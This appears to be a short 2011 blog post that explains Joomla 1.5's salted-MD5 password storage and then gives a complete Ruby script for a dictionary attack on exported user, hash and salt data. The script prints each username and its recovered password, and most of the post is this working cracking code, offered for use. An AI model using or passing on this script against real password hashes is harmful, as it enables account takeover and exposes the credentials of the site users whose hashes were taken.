Heyder Andrade: Simple Joomla Password "Cracker"

Joomla uses a simple MD5 Cryptographic hash function to create and store users passwords. For Security resons, one of the inputs for this function is a random salt. However, this salt is stored in the jos_user (by default) table, together with the generated hash.

Once in possession of this information it is possible to perform a dictionary attack against these hashes using a simple ruby script to get users password.

The first parameter is the dictionary file and the second is the hash file in the following format: user;hash;salt

Tested on Joomla Version 1.5.23


#!/usr/bin/env ruby
require 'digest/md5'


def JoomlaCrack(key, hash, salt)

    if (generateJoomlaHash(key,salt) == hash)
        return true
    else
        return false
    end
        
end


def generateJoomlaHash(pKey,pSalt)
    return Digest::MD5.hexdigest(pKey + pSalt);
end

def run(fDic,fHash)
  begin
    founds = Hash.new()
    fDic.each do |key|
      File.open(fHash,'r').each do |line|
        name,hash,salt = line.split(';')
        name.to_s.chomp!
        hash.to_s.chomp!
        salt.to_s.chomp!
        key.to_s.chomp!
        if founds.include?(name)
          next
        else
          if JoomlaCrack(key, hash, salt)
            puts "#{name}:#{key}"
            founds[name] = key
            next
          else
            next
          end
        end
      end
    end
    fDic.close
#    puts founds.inspect
  end
end


fDic =  File.open(ARGV[0],'r')
fHash =  ARGV[1]

run(fDic,fHash)

Heyder Andrade

terça-feira, 2 de agosto de 2011

Simple Joomla Password "Cracker"

Um comentário: